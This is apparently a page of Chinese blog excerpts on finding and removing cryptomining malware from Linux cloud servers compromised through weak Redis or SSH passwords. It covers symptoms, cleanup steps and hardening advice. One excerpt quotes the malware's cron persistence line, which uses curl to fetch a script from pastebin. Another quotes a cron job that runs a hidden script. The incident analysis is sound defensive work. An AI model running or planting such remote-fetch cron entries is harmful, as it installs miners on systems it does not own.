Linux 服務器上有挖礦病毒處理 分析 今天遇到病毒挖礦，有點小興奮。 來波分析： 看上面的症狀是：攻擊者通過docker入侵的【后面了解，可能是redis賬號密碼簡單的原因被爆破的】 最奇詭的事，攻擊者可能通過提權，獲取到root的權限。然后一些列的挖礦病毒 大致流程圖 ...

這幾天阿里雲雲服務器cpu一直跑滿，一查發現有個定時任務，在搜索一下，發現自己中毒了，原來前幾天搞redis學習的時候設置了個弱密碼，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

一般情況下，挖礦病毒都是自動掃描+自動掛馬生成的，並不會是有專人進行攻擊，所以也比較好清除，注意清除之后需要 check 有無后門。 最重要幾點（也可能是被hack的原因）：禁止 ROOT 用戶登陸，ROOT 不能使用弱密碼，FRP 需要配置，不能使用默認選項。 挖礦進程占用的 CPU 資源 ...

特征如下： CPU占用一直比較高，初步分析是挖礦程序： 系統的crontab –l顯示調度列表如下： 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看腳本內容： #!/bin ...

中毒原因，redis bind 0.0.0.0 而且沒有密碼，和安全意識太薄弱。 所以，redis一定要設密碼，改端口，不要用root用戶啟動，如果業務沒有需要，不要bind 0.0.0.0！！！！！！！！！！！ 這個病毒能都橫向傳播，不要以為在外網redis的端口不通就沒有事情。只要內網 ...

被入侵后的現象: 發現有qW3xT.2與ddgs兩個異常進程，消耗了較高的cpu，kill掉后 過一會就會重新出現。 kill 掉這兩個異常進程后，過一段時間看到了如下進程： 首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本，輸入crontab -e ...

發現病毒入侵歷程： 昨天正常網上遨游在技術天地中，忽然發現網絡變得異常卡頓，解析網站變得很慢 甚至打不開，我的第一反應就是DNS可能出了問題，然后ping 域名同時追蹤外網地址 ，並同時ping包結果都沒有問題。然后就啟動測速軟件，測速結果3M不到，我的網絡環境是電信200M+聯通300M ...

處理過程： 1、查找異常進程，確定病毒進程，定位病毒腳本的執行用戶 2、殺掉病毒進程，注意要檢查清楚，病毒進程可能有多個，同時也要注意不要誤刪系統進程或者阿里雲的進程 3、檢查定時任務，一般都會有，以達到病毒自啟的效果，通過定時任務內容定位病毒腳本的位置，然后刪除病毒腳本 4、整改 ...